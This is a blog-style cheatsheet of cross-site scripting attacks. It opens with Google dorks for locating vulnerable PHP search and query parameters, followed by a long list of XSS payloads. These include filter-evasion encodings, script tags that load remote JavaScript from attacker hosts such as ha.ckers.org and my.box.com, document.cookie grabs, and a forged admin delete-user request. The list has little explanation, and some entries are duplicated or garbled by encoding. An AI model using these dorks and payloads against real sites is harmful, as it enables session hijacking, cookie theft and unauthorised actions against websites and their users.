XSS payload cheatsheet

Hacking Truth
0







Some XSS google dorks -



  • inurl:".php?cmd="
  • inurl:".php?z="
  • inurl:".php?q="
  • inurl:".php?search="
  • inurl:".php?query="
  • inurl:".php?searchstring="
  • inurl:".php?keyword="
  • inurl:".php?file="
  • inurl:".php?years="
  • inurl:".php?txt="
  • inurl:".php?tag="
  • inurl:".php?max="
  • inurl:".php?from="
  • inurl:".php?author="
  • inurl:".php?pass="
  • inurl:".php?feedback="
  • inurl:".php?mail="
  • inurl:".php?cat="
  • inurl:".php?vote="
  • inurl:search.php?q=
  • inurl:com_feedpostold/feedpost.php?url=
  • inurl:scrapbook.php?id=
  • inurl:headersearch.php?sid=
  • inurl:/poll/default.asp?catid=
  • inurl:/search_results.php?search=





Background Concept of XSS :- Click Here


Some XSS PAYLOADS -




  • <script>alert(123)</script>
  • <script>alert("hellox worldss");</script>
  • javascript:alert("hellox worldss")
  • <img src="javascript:alert('XSS');">
  • <img src=javascript:alert(&quot;XSS&quot;)>
  • <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  • <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  • <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  • <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  • <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  • <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  • <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  • <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  • <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  • <<SCRIPT>alert("XSS");//<</SCRIPT>
  • <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  • ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  • <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  • <script>alert("XSS");</script>&search=1
  • 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  • <h1><font color=blue>hellox worldss</h1>
  • <BODY ONLOAD=alert('hellox worldss')>
  • <input onfocus=write(XSS) autofocus>
  • <input onblur=write(XSS) autofocus><input autofocus>
  • <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  • <form><button formaction="javascript:alert(XSS)">lol
  • <!--<img src="--><img src=x onerror=alert(XSS)//">
  • <![><img src="]><img src=x onerror=alert(XSS)//">
  • <style><img src="</style><img src=x onerror=alert(XSS)//">
  • <? foo="><script>alert(1)</script>">
  • <! foo="><script>alert(1)</script>">
  • </ foo="><script>alert(1)</script>">
  • <? foo="><x foo='?><script>alert(1)</script>'>">
  • <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
  • <% foo><x foo="%><script>alert(123)</script>">
  • <div style="font-family:'foo&#10;;color:red;';">LOL
  • LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
  • <script>({0:#0=alert/#0#/#0#(0)})</script>
  • <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
  • &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
  • \\";alert('XSS');//
  • &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
  • &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
  • &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  • &lt;BODY ONLOAD=alert('XSS')&gt;
  • &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
  • &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
  • &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
  • &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
  • &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
  • &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
  • &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
  • &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
  • &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
  • &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
  • &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
  • &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  • &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
  • &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
  • &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
  • žscriptualert(EXSSE)ž/scriptu
  • &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
  • &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
  • &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"
  • &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
  • &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;
  • &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  • &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  • &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  • &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;
  • &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  • &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
  • &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;
  • &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;
  • &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;
  • exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
  • xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
  • &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
  • &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  • &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;
  • &lt;!--&#91;if gte IE 4&#93;&gt;
  • &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
  • &lt;!&#91;endif&#93;--&gt;
  • &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;
  • &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;
  • &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
  • &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  • &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  • a=\"get\";
  • b=\"URL(\\"\";
  • c=\"javascript&#058;\";
  • d=\"alert('XSS');\\")\";
  • eval(a+b+c+d);
  • &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
  • &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;
  • &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  • &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  • &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
  • &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
  • &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  • &lt;HTML&gt;&lt;BODY&gt;
  • &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;
  • &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
  • &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
  • &lt;/BODY&gt;&lt;/HTML&gt;
  • &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;
  • &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;
  • &lt;? echo('&lt;SCR)';
  • echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
  • &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;
  • Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
  • &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
  • &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  • &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  • &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  • &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  • &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  • &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  • &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  • &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  • &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;
  • &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;
  • &lt;
  • %3C
  • &lt
  • &lt;
  • &LT
  • &LT;
  • &#60
  • &#060
  • &#0060
  • &#00060
  • &#000060
  • &#0000060
  • &lt;
  • &#x3c
  • &#x03c
  • &#x003c
  • &#x0003c
  • &#x00003c
  • &#x000003c
  • &#x3c;
  • &#x03c;
  • &#x003c;
  • &#x0003c;
  • &#x00003c;
  • &#x000003c;
  • &#X3c
  • &#X03c
  • &#X003c
  • &#X0003c
  • &#X00003c
  • &#X000003c
  • &#X3c;
  • &#X03c;
  • &#X003c;
  • &#X0003c;
  • &#X00003c;
  • &#X000003c;
  • &#x3C
  • &#x03C
  • &#x003C
  • &#x0003C
  • &#x00003C
  • &#x000003C
  • &#x3C;
  • &#x03C;
  • &#x003C;
  • &#x0003C;
  • &#x00003C;
  • &#x000003C;
  • &#X3C
  • &#X03C
  • &#X003C
  • &#X0003C
  • &#X00003C
  • &#X000003C
  • &#X3C;
  • &#X03C;
  • &#X003C;
  • &#X0003C;
  • &#X00003C;
  • &#X000003C;
  • \x3c
  • \x3C
  • \u003c
  • \u003C









  • &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
  • &lt;IMG SRC=\"javascript&#058;alert('XSS')\"
  • &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
  • &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
  • &lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
  • &lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  • &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;
  • &lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  • &lt;IMG SRC=\"   javascript&#058;alert('XSS');\"&gt;
  • perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
  • perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out
  • &lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;
  • &lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;
  • &lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;
  • &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
  • &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
  • &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  • &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
  • &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
  • &lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
  • &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
  • &lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
  • &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  • &lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
  • &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
  • '';!--\"&lt;XSS&gt;=&{()}
  • ';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  • ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  • '';!--"<XSS>=&{()}
  • <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  • <IMG SRC="javascript:alert('XSS');">
  • <IMG SRC=javascript:alert('XSS')>
  • <IMG SRC=javascrscriptipt:alert('XSS')>
  • <IMG SRC=JaVaScRiPt:alert('XSS')>
  • <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  • <IMG SRC=" &#14;  javascript:alert('XSS');">
  • <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  • <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  • <<SCRIPT>alert("XSS");//<</SCRIPT>
  • <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  • \";alert('XSS');//
  • </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  • ¼script¾alert(¢XSS¢)¼/script¾
  • <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  • <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  • <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  • <TABLE BACKGROUND="javascript:alert('XSS')">
  • <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  • <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  • <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  • <DIV STYLE="width: expression(alert('XSS'));">
  • <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  • <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  • <XSS STYLE="xss:expression(alert('XSS'))">
  • exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
  • <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
  • a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
  • <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  • <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
  • <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  • <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
  • <form><button formaction="javascript:alert(123)">crosssitespt
  • <frameset onload=alert(123)>
  • <!--<img src="--><img src=x onerror=alert(123)//">
  • <style><img src="</style><img src=x onerror=alert(123)//">
  • <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  • <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  • <embed src="javascript:alert(1)">
  • <? foo="><script>alert(1)</script>">
  • <! foo="><script>alert(1)</script>">
  • </ foo="><script>alert(1)</script>">
  • <script>({0:#0=alert/#0#/#0#(123)})</script>
  • <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
  • <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
  • <script src="#">{alert(1)}</script>;1
  • <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
  • <svg xmlns="#"><script>alert(1)</script></svg>
  • <svg onload="javascript:alert(123)" xmlns="#"></svg>
  • <iframe xmlns="#" src="javascript:alert(1)"></iframe>
  • +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
  • %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
  • +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
  • %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
  • %253cscript%253ealert(document.cookie)%253c/script%253e
  • “><s”%2b”cript>alert(document.cookie)</script>
  • “><ScRiPt>alert(document.cookie)</script>
  • “><<script>alert(document.cookie);//<</script>
  • foo<script>alert(document.cookie)</script>
  • <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
  • %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
  • ‘; alert(document.cookie); var foo=’
  • foo\’; alert(document.cookie);//’;
  • </script><script >alert(document.cookie)</script>
  • <img src=asdf onerror=alert(document.cookie)>
  • <BODY ONLOAD=alert(’XSS’)>
  • <script>alert(1)</script>
  • "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
  • <video src=1 onerror=alert(1)>
  • <audio src=1 onerror=alert(1)>




I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)


Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.
Post a Comment (0)
Our website uses cookies to enhance your experience. Learn More
Accept !